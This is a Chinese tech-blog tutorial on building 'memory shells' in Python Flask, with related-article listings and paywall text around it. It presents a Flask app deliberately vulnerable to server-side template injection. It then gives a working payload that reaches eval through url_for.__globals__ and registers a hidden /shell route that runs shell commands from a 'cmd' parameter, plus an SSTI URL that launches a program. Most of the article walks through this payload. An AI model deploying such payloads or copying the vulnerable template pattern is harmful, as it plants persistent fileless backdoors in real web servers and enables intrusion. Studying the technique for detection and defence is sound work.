python内存马学习

最新推荐文章于 2024-12-04 20:40:09 发布
最新推荐文章于 2024-12-04 20:40:09 发布
阅读量1.6k 收藏 15
点赞数 33
文章标签: python 学习 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_79724395/article/details/139094906
版权

python内存马学习

python内存马学习

环境搭建和复现

from flask import Flask, request, render_template_string

app = Flask(__name__)


@app.route('/')
def hello_world():  # put application's code here
    person = 'knave'
    if request.args.get('name'):
        person = request.args.get('name')
    template = '<h1>Hi, %s.</h1>' % person
    return render_template_string(template)


if __name__ == '__main__':
    app.run()

执行payload

url_for.__globals__['__builtins__']['eval']("app.add_url_rule('/shell', 'shell', lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('cmd','whoami')).read())",{
   '_request_ctx_stack':url_for.__globals__['_request_ctx_stack'],'app':url_for.__globals__['current_app']})

执行后访问我们的shell路由,然后就可以执行命令

比如cmd=dir

在这里插入图片描述

分析payload

url_for.__globals__['__builtins__']['eval'](
	"app.add_url_rule(
		'/shell', 
		'shell', 
		lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('cmd', 'whoami')).read()
		)
	",
	{
		'_request_ctx_stack':url_for.__globals__['_request_ctx_stack'],
		'app':url_for.__globals__['current_app']
	}
)

url_for.__globals__['__builtins__']['eval']

这个就是去获取我们的恶意模块eval

比如我们现在就可以执行命令了

http://127.0.0.1:5000/?name={
  {url_for.__globals__['__builtins__']['eval']("__import__('os').system('calc')")}}

在这里插入图片描述

但是我们研究python内存马,就需要找无文件落地的方法

在python中,我们就要注册一个恶意的路由,并且可以执行恶意方法

这就涉及到我们payload一个关键的点了app.add_url_rule函数

在Flask中注册路由的时候是添加的@app.route装饰器来实现的。

我们看看代码,它内部调用

        def decorator(f: T_route) -> T_route:
            endpoint = options.pop("endpoint", None)
            self.add_url_rule(rule, endpoint, f, **options)
            return f

add_url_rule函数,说明创建路由的时候,会使用add_url_rule来进行一个创建

def add_url_rule(
        self,
        rule: str,
        endpoint: str
最低0.47元/天 解锁文章
llll00lllll
关注
内存介绍及分析-带查杀工具tomcat memshell scanner.jsp
weixin_65629944的博客
12-18 1300
先判断是通过什么方法注入的内存,可以先查看web日志是否有可疑的web访问日志,如果是filter或者listener类型就会有大量url请求路径相同参数不同的,或者页面不存在但是返回200的,查看是否有类似哥斯拉、冰蝎相同的url请求,哥斯拉和冰蝎的内存注入流量特征与普通webshell的流量特征基本吻合。4.java VisualVM工具:是一款免费的,集成了多个 JDK 命令行工具的可视化工具,它能为您提供强大的分析能力,对 Java 应用程序做性能分析和调优。cmd=后跟命令即可。
MemShellDemo:内存Demo合集 memshell demo for java php python
05-13
内存Demo :light_bulb: 介绍 本项目为各类内存的Demo合集。 本代码仅供学习,仅供学习交流,请勿用于非法和商业用途,否则后果自负。 :sparkles: 分析 PHP内存 Java内存(基于java instrumentation && retransform) flask内存 :houses: 检测工具 检测工具由于商业化原因,暂不开源。 可自行根据检测原理设计方案,如想交流技术可添加WX。 :hammer_and_wrench: todo redefine字节增强型(冰蝎内存) go django java扩展中间件(目前只有tomcat)
关于Java/Python/PHP 内存
2301_80115097的博客
11-15 1192
因为内存种类繁杂,每次都要翻看很多文章,又加上最近有某个大活动,因此就写了这篇文章来总结一下常见的3种语言(PHP、Python、JAVA)的内存的注入方法和查杀方法,并尝试自己完成一个内存查杀工具的实现。希望本篇文章能给师傅们带来一些启发。文章一长就难免在表达和准确性上有所疏漏,如有错误或不足,请师傅们指正。
[Python]Flask内存学习
feng的博客
10-28 1762
前言 之前一直想学习的东西但是一直咕,终于选了个晚上在配置vscode调试PHP底层C代码的过程中卡住的时候去学了这个flask的内存,也是很有意思。 前置知识 请求上下文 简单的flask的ssti肯定需要知道,这个就不提了。 首先就是跟着参考链接中的Flask上下文管理机制流程进行了一波学习,打断点跟进一波。 flask在接受到请求的时候会调用app的__call__方法: def __call__(self, environ, start_response): """The
Flask内存
Y4tacker的博客
03-30 1009
文章目录前言前置知识app.add_url_rule()函数lambda表达式正文参考文章 前言 只是感觉比较好玩,索性简单学习了下,还蛮有意思 前置知识 app.add_url_rule()函数 一个简单的用法 app.add_url_rule('/index/',endpoint='index',view_func=index) add_url_rule三个参数解释: 第一个参数:函数对应的url规则,满足条件和app.route()的第一个参数一样,必须以’/'开始 endpoint:站点,就是在使
Python 内存管理 进阶详细篇
weixin_59131972的博客
05-03 496
分代回收,根据内存中对象的存活时间将他们分为3代,新生的对象放入到0代,如果一个对象能在第0代的垃圾回收过程中存活下来,GC就会将其放入到1代中,如果1代里的对象在第1代的垃圾回收过程中存活下来,则会进入到2代。# 在深拷贝中,被拷贝的对象是不可变对象,深拷贝则不会生成新的对象,也就是不会在内存中为它开配一块新的位置,一切的一切还是使用原来的存储位置。这个根对象就是全局对象,调用栈,寄存器。# 如果被拷贝的对象是可变对象,那么会彻底创建一个新的对象出来,主要讲的还是对象的存储位置,对象中的元素的存储位置。
初识内存
晚棠是锦鲤。
06-17 1642
webshell发展、内存分类和原理、内存排查
python-flask框架不出网反序列化解法(新版内存)
2301_80148821的博客
10-25 1122
当网页请求进入Flask时, 会实例化一个Request Context. 在Python中分出了两种上下文: 请求上下文(request context)、应用上下文(session context). 一个请求上下文中封装了请求的信息, 而上下文的结构是运用了一个Stack的栈结构, 也就是说它拥有一个栈所拥有的全部特性. request context实例化后会被push到栈_request_ctx_stack中, 基于此特性便可以通过获取栈顶元素的方法来获取当前的请求.()或.pop()替换.
探索MemShellDemo: Java/PHP/Python内存技术Demo
- Django内存可能研究如何针对Python的Django框架实现内存技术。 综上所述,MemShellDemo是一个高度专业化的资源,它不仅展示了如何创建内存,还涉及到攻击技术和防御策略。尽管该项目具有潜在的安全风险,...
Java服务安全内存实践资料合集(33份).zip
最新发布
01-14
Java服务安全内存实践资料合集,共33份,供大家学习参阅。 Python 内存分析.pdf 初探Java安全之Spring内存.pdf 从一个被Tomcat拒绝的漏洞到特殊内存.pdf 从CVE-2022-22947到Spring WebFlux内存与哥斯拉....
flask内存(老版)
wednis的博客
07-14 498
request_ctx_stack是flask内部处理请求上下文的一个全局变量,用来区分不同请求的上下文环境,同时也是一个栈,top获取栈顶对象,再通过request.args.get可以获取栈顶对象的request对象的参数(按我理解栈顶对象应该就是请求上下文)1.利用flask的内置函数url_for.__globals__,可以获取该函数所在模块命名空间下的所有变量,其中包括__builtins__,自然就能利用python内置函数例如eval等。3.寻找eval执行代码的作用域。
flask内存的真谛!!!
Mssqj的博客
12-04 1403
flask内存
flask之url_for()函数解析
专注自动化、性能测试、测试架构学习交流
06-10 3230
官方文档 1.url_for()作用: (1)给指定的函数构造 URL。 (2)访问静态文件(CSS /JavaScript 等)。 只要在你的包中或是模块的所在目录中创建一个名为static的文件夹,在应用中使用/static即可访问。 1.1给指定的函数构造 URL: 它接受函数名作为第一个参数,也接受 URL 规则中对应的变量作为参数。未知变量部分会添加到 URL 末尾作为查询参数。 from flask import Flask, url_for app = Flask(__n...
内存原理及查杀
m0_63081418的博客
08-13 1734
内存一些基本原理,大佬勿喷
内存检测排查手段
A1_3_9_7的博客
03-30 3192
内存是无文件落地webshell中最常见的攻击手段,随着攻防演练对抗强度越来越高,流量分析、EDR等专业安全设备被蓝方广泛使用,传统的文件上传的webshll以及文件形式的后门容易被检测到,文件shell明显气数已尽,而内存因其隐蔽性等优点从而越来越盛行。
python之sys模块
热门推荐
zyc_love_study的博客
01-05 6万+
python版本: Python 2.7.6 1: sys是python自带模块. 利用 import 语句输入sys 模块。 当执行import sys后, python在 sys.path 变量中所列目录中寻找 sys 模块文件。然后运行这个模块的主块中的语句进行初始化,然后就可以使用模块了 。 2: sys模块常见函数 可以通过dir()方法查看模块中可用的方法. 结果如下, 很
内存介绍及分析(转载)
李铭铭的博客
12-16 1万+
经过近几年演练各种攻防对抗的开展,各个厂商对于传统的webshell文件都有很强的检测模型及检测技术,而内存却不容易被检测到,本次小编整理了各类内存Webshell工具的使用方法和各类内存Webshell的识别方法。以便大家可以更加了解内存的原理,而且如果真的不幸被植入内存,也能更及时的解决。 内存Webshell简介 内存webshell相比于常规webshell更容易躲避传统安全监测设备的检测,通常被用来做持久化,规避检测,持续驻留目标服务器。无文件攻击、内存Webshell、..
Python 程序内存分析
zzzzls 的博客
04-07 2226
文章目录软件的运行过程Python解释器内存划分不可变类型 -- 内存模型字符串操作整数操作可变类型 -- 内存模型 软件的运行过程 软件是在计算机上运行,安装在计算机硬盘中的,计算机的基本组成如下图: 软件在计算机中运行时,是运行在系统的内存中的,平时使用电脑的时候打开软件较多的话,电脑会卡顿(内存空间不足!) 编程语言编写的代码,就是在编写软件,所以代码的运行就是运行在内存中的。 Pytho...
python获取对象的大小_Python实现计算对象的内存大小示例
weixin_39942992的博客
11-28 204
本文实例讲述了Python实现计算对象的内存大小。分享给大家供大家参考,具体如下:一般的sys.getsizeof()显示不了复杂的字典。查看类中的内容:def dump(obj):for attr in dir(obj):#dir显示类的所有方法print(" obj.%s = %r" % (attr, getattr(obj, attr)))这里用递归调用所有对象的getsizeof:def ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值